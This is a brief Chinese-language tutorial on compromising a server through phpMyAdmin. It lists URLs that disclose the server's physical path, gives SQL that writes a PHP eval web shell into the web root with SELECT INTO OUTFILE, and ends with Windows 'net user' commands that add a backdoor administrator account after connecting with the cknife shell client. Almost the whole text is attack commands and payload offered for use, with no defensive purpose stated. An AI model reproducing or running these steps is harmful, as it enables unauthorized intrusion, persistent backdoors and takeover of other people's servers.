利用phpmyadmin提权
爆路径
/phpmyadmin/libraries/lect_lang.lib.php/phpmyadmin/index.php?lang[]=1/phpmyadmin/phpinfo.php/load_file()/phpmyadmin/themes/darkblue_orange/layout.inc.php/phpmyadmin/libraries/select_lang.lib.php/phpmyadmin/libraries/lect_lang.lib.php/phpmyadmin/libraries/mcrypt.lib.php得到物理路径 c:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php
写马
create table a (cmd text not null);insert into a (cmd) values("<?php eval($_post[cknife]);?>");select cmd from a into outfile "c:/wamp/www/phpmyadmin/d.php";drop table if exists a;
获得webshell
最后用cknife连接,创建帐户并添加到管理员用户组
net user admin admin /add
net localgroup administrator admin /add
以上就是怎么利用phpmyadmin提权的详细内容。
